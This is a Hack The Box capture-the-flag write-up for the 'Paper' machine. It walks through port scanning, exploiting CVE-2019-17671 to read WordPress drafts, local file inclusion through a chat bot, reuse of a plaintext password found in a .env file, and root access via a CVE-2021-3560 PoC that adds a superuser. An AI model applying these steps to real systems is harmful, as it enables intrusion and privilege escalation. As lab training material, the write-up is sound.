HTB Writeup: Paper

You miss 100% of the shots you don’t take ~ Wayne Gretzky ~~ Michael Scott

Enumeration

nmap Scan

# Nmap 7.92 scan initiated Mon Apr 11 15:07:52 2022 as: nmap -sC -sV -T3 -oN nmap.all-port.txt -vv -p- 10.10.11.143
Nmap scan report for 10.10.11.143 (10.10.11.143)
Host is up, received echo-reply ttl 63 (0.084s latency).
Scanned at 2022-04-11 15:07:58 IST for 54s
Not shown: 65532 closed tcp ports (reset)
PORT    STATE SERVICE  REASON         VERSION
22/tcp  open  ssh      syn-ack ttl 63 OpenSSH 8.0 (protocol 2.0)
80/tcp  open  http     syn-ack ttl 63 Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)
|_http-title: HTTP Server Test Page powered by CentOS
| http-methods:
|   Supported Methods: GET POST OPTIONS HEAD TRACE
|_  Potentially risky methods: TRACE
|_http-generator: HTML Tidy for HTML5 for Linux version 5.7.28
|_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
443/tcp open  ssl/http syn-ack ttl 63 Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)
| http-methods:
|   Supported Methods: GET POST OPTIONS HEAD TRACE
|_  Potentially risky methods: TRACE
|_http-generator: HTML Tidy for HTML5 for Linux version 5.7.28
|_http-title: HTTP Server Test Page powered by CentOS
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=Unspecified/countryName=US/emailAddress=root@localhost.localdomain
| Subject Alternative Name: DNS:localhost.localdomain
| Issuer: commonName=localhost.localdomain/organizationName=Unspecified/countryName=US/emailAddress=root@localhost.localdomain/organizationalUnitName=ca-3899279223185377061
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-07-03T08:52:34
| Not valid after:  2022-07-08T10:32:34
| MD5:   579a 92bd 803c ac47 d49c 5add e44e 4f84
| SHA-1: 61a2 301f 9e5c 2603 a643 00b5 e5da 5fd5 c175 f3a9
| -----BEGIN CERTIFICATE-----
| MIIE4DCCAsigAwIBAgIIdryw6eirdUUwDQYJKoZIhvcNAQELBQAwgY8xCzAJBgNV
| BAYTAlVTMRQwEgYDVQQKDAtVbnNwZWNpZmllZDEfMB0GA1UECwwWY2EtMzg5OTI3
| OTIyMzE4NTM3NzA2MTEeMBwGA1UEAwwVbG9jYWxob3N0LmxvY2FsZG9tYWluMSkw
| JwYJKoZIhvcNAQkBFhpyb290QGxvY2FsaG9zdC5sb2NhbGRvbWFpbjAeFw0yMTA3
| MDMwODUyMzRaFw0yMjA3MDgxMDMyMzRaMG4xCzAJBgNVBAYTAlVTMRQwEgYDVQQK
| DAtVbnNwZWNpZmllZDEeMBwGA1UEAwwVbG9jYWxob3N0LmxvY2FsZG9tYWluMSkw
| JwYJKoZIhvcNAQkBFhpyb290QGxvY2FsaG9zdC5sb2NhbGRvbWFpbjCCASIwDQYJ
| KoZIhvcNAQEBBQADggEPADCCAQoCggEBAL1/3n1pZvFgeX1ja/w84jNxT2NcBkux
| s5DYnYKeClqncxe7m4mz+my4uP6J1kBP5MudLe6UE62KFX3pGc6HCp2G0CdA1gQm
| 4WYgF2E7aLNHZPrKQ+r1fqBBw6o3NkNxS4maXD7AvrCqkgpID/qSziMJdUzs9mS+
| NTzWq0IuSsTztLpxUEFv7T6XPGkS5/pE2hPWO0vz/Bd5BYL+3P08fPsC0/5YvgkV
| uvFbFrxmuOFOTEkrTy88b2fLkbt8/Zeh4LSdmQqriSpxDnag1i3N++1aDkIhAhbA
| LPK+rZq9PmUUFVY9MqizBEixxRvWhaU9gXMIy9ZnPJPpjDqyvju5e+kCAwEAAaNg
| MF4wDgYDVR0PAQH/BAQDAgWgMAkGA1UdEwQCMAAwIAYDVR0RBBkwF4IVbG9jYWxo
| b3N0LmxvY2FsZG9tYWluMB8GA1UdIwQYMBaAFBB8mEcpW4ZNBIaoM7mCF/Z+7ffA
| MA0GCSqGSIb3DQEBCwUAA4ICAQCw4uQfUe+FtsPdT0eXiLHg/5kXBGn8kfJZ45hP
| gcuwa5JfAQeA3JXx7piTSiMMk0GrWbqbrpX9ZIkwPnZrN+9PV9/SNCEJVTMy+LDQ
| QGsyqwkZpMK8QThzxRvXvnyf3XeEFDL6N4YeEzWz47VNlddeqOBHmrDI5SL+Eibh
| wxNj9UXwhEySUpgMAhU+QtXk40sjgv4Cs3kHvERvpwAfgRA7N38WY+njo/2VlGaT
| qP+UekP42JveOIWhf9p88MUmx2QqtOq/WF7vkBVbAsVs+GGp2SNhCubCCWZeP6qc
| HCX0/ipKZqY6zIvCcfr0wHBQDY9QwlbJcthg9Qox4EH1Sgj/qKPva6cehp/NzsbS
| JL9Ygb1h65Xpy/ZwhQTl+y2s+JxAoMy3k50n+9lzCFBiNzPLsV6vrTXCh7t9Cx07
| 9jYqMiQ35cEbQGIaKQqzguPXF5nMvWDBow3Oj7fYFlCdLTpaTjh8FJ37/PrhUWIl
| Li+WW8txrQKqm0/u1A41TI7fBxlUDhk6YFA+gIxX27ntQ0g+lLs8rwGlt/o+e3Xa
| OfcJ7Tl0ovWa+c9lWNju5mgdU+0v4P9bqv4XcIuyE0exv5MleA99uOYE1jlWuKf1
| m9v4myEY3dzgw3IBDmlYpGuDWQmMYx8RVytYN3Z3Z64WglMRjwEWNGy7NfKm7oJ4
| mh/ptg==
|_-----END CERTIFICATE-----
|_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
| tls-alpn:
|_  http/1.1
|_ssl-date: TLS randomness does not represent time

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Apr 11 15:08:52 2022 -- 1 IP address (1 host up) scanned in 59.75 seconds
  1. Two web servers, listening on TCP/80 and TCP/443

  2. An abnormal response header is found while making curl requests:

    curl -I http://`cat ip.txt`/
       
    # HTTP/1.1 403 Forbidden
    # Date: Tue, 26 Jul 2022 08:51:43 GMT
    # Server: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
    # X-Backend-Server: office.paper
    # Last-Modified: Sun, 27 Jun 2021 23:47:13 GMT
    # ETag: "30c0b-5c5c7fdeec240"
    # Accept-Ranges: bytes
    # Content-Length: 199691
    # Content-Type: text/html; charset=UTF-8
    
  3. The header X-Backend-Server points to a VHOST office.paper

  4. Another curl request with the header Host: office.paper returns a HTTP 200 with hinting a wordpress installation.

    Untitled

    Untitled

  5. One of the post says that there might be some secret contents posted in drafts of the user prisonmike

    Untitled

wp-scan

  1. The wp-scan shows that the website is vulnerable to a number of vulnerabilities.

     | [!] Title: WordPress <= 5.2.3 - Unauthenticated View Private/Draft Posts
     |     Fixed in: 5.2.4
     |     References:
     |      - https://wpscan.com/vulnerability/3413b879-785f-4c9f-aa8a-5a4a1d5e0ba2
     |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17671
     |      - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/
     |      - https://blog.wpscan.com/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html
     |      - https://github.com/WordPress/WordPress/commit/f82ed753cf00329a5e41f2cb6dc521085136f308
     |      - https://0day.work/proof-of-concept-for-wordpress-5-2-3-viewing-unauthenticated-posts/
     |
    
  2. Unauthenticated users can view Private and or Draft posts by visiting http://office.paper/?static=1 ( PoC)[CVE-2019-17671]

    Untitled

  3. A secret registration URL is obtained, which points to another VHOST. chat.office.paper.

  4. The URL is a link to rocket chat registration page.

    Untitled

Initial Foothold

  1. On registering, messages history in the channel #general is visible.

  2. A bot application is added to the workspace with recyclops

    Untitled

  3. The recyclops file and recyclops list functions are found to vulnerable to LFI on some basic testing.

    Untitled

Untitled

User Access

  1. A user dwight is available on the remote target as seen by contents of /etc/passwd.

  2. A bash sdript bot_restart.sh is available to read in dwight’s home folder.

    #!/bin/bash
       
    # Cleaning hubot's log so that it won't grow too large.
    echo "" > /home/dwight/hubot/.hubot.log
       
    # For starting the bot 20-ish (10+20) seconds late, when the server is restarted.
    # This is because MongoDB and Rocket-Chat server needs some time to startup properly
    sleep 10s
       
    # Checks if Hubot is running every 10s
    while [ 1 ];
    do
    sleep 20s
    alive=$(/usr/sbin/ss -tulnp|grep 8000);
    if [[ -n $alive ]]; then
    err=$(grep -i 'unhandled-rejections=strict' /home/dwight/hubot/.hubot.log)
    if [[ -n $err ]]; then
    # Restarts bot
    echo "[-] Bot not running! date";
    #Killing the old process
    pid=$(ps aux|grep -i 'hubot -a rocketchat'|grep -v grep|cut -d " " -f6);
    kill -9 $pid;
    cd /home/dwight/hubot;
    # Cleaning hubot's log so that it won't grow too large.
    echo "" > /home/dwight/hubot/.hubot.log
    bash /home/dwight/hubot/start_bot.sh&
    else
       
    echo "[+] Bot running succesfully! date";
    fi
       
    else
    # Restarts bot
    echo "[-] Bot not running! date";
    #Killing the old process
    pid=$(ps aux|grep -i 'hubot -a rocketchat'|grep -v grep|cut -d " " -f6);
    kill -9 $pid;
    cd /home/dwight/hubot;
    bash /home/dwight/hubot/start_bot.sh&
    fi
       
    done
    
  3. The contents of the folder /home/dwight/hubot:

    drwx------ 8 dwight dwight 4096 Sep 16 2021 .
    drwx------ 11 dwight dwight 281 Feb 6 07:55 ..
    -rw-r--r-- 1 dwight dwight 0 Jul 3 2021 \
    srwxr-xr-x 1 dwight dwight 0 Jul 3 2021 127.0.0.1:8000
    srwxrwxr-x 1 dwight dwight 0 Jul 3 2021 127.0.0.1:8080
    drwx--x--x 2 dwight dwight 36 Sep 16 2021 bin
    -rw-r--r-- 1 dwight dwight 258 Sep 16 2021 .env
    -rwxr-xr-x 1 dwight dwight 2 Jul 3 2021 external-scripts.json
    drwx------ 8 dwight dwight 163 Jul 3 2021 .git
    -rw-r--r-- 1 dwight dwight 917 Jul 3 2021 .gitignore
    -rw-r--r-- 1 dwight dwight 17911 Jul 26 05:29 .hubot.log
    -rwxr-xr-x 1 dwight dwight 1068 Jul 3 2021 LICENSE
    drwxr-xr-x 89 dwight dwight 4096 Jul 3 2021 node_modules
    drwx--x--x 115 dwight dwight 4096 Jul 3 2021 node_modules_bak
    -rwxr-xr-x 1 dwight dwight 1062 Sep 16 2021 package.json
    -rwxr-xr-x 1 dwight dwight 972 Sep 16 2021 package.json.bak
    -rwxr-xr-x 1 dwight dwight 30382 Jul 3 2021 package-lock.json
    -rwxr-xr-x 1 dwight dwight 14 Jul 3 2021 Procfile
    -rwxr-xr-x 1 dwight dwight 5044 Jul 3 2021 README.md
    drwx--x--x 2 dwight dwight 193 Jan 13 2022 scripts
    -rwxr-xr-x 1 dwight dwight 100 Jul 3 2021 start_bot.sh
    drwx------ 2 dwight dwight 25 Jul 3 2021 .vscode
    -rwxr-xr-x 1 dwight dwight 29951 Jul 3 2021 yarn.lock
    
  4. Contents of the file /home/dwight/hubot/.env:

    export ROCKETCHAT_URL='http://127.0.0.1:48320'
    export ROCKETCHAT_USER=recyclops
    export ROCKETCHAT_PASSWORD=Queenofblad3s!23
    export ROCKETCHAT_USESSL=false
    export RESPOND_TO_DM=true
    export RESPOND_TO_EDITED=true
    export PORT=8000
    export BIND_ADDRESS=127.0.0.1
    
  5. A password is available Queenofblad3s!23

  6. Using the credentials dwight:Queenofblad3s!23, a valid SSH session is obtained.

    Untitled

Privilege Escalation

Enumeration

  1. A basic enumeration using linpeas, shows that the target machine is vulnerable to [CVE-2021-3560](https://access.redhat.com/security/cve/CVE-2021-3560)
  2. Using the PoC available here, a privilege escalation can be achieved.

Exploitation

  1. The [poc.sh](http://poc.sh) is downloaded and sent to the taget machine.

  2. The following command will add a superuser with credentials: mostwanted002:mostwanted002

    ./poc.sh -u=mostwanted002 -p=mostwanted002
    

    Untitled

  3. The new user can be accessed by logging in via su.

    su - mostwanted002
    

The remote target is now completely compromised.

Avatar
Mayank Malik
CRTP | Incident Responder | Synack Red Team Member | Threat Analyst | Security Researcher | Cloud/Network Architect

Mayank Malik is a tech savvy person, Red Team Enthusiast, and likes to wander around to learn new stuff. Cryptography, Networking and System Administrations are his forte. He’s one of the Founding Members for CTF Team, Abs0lut3Pwn4g3, and Core Member at DC 91120 (DEFCON Community Group). Apart from the mentioned skills, he’s good at communication skills and is goal oriented person. Yellow belt holder at pwn.college in pursue of learning and achieving Blue Belt.

Related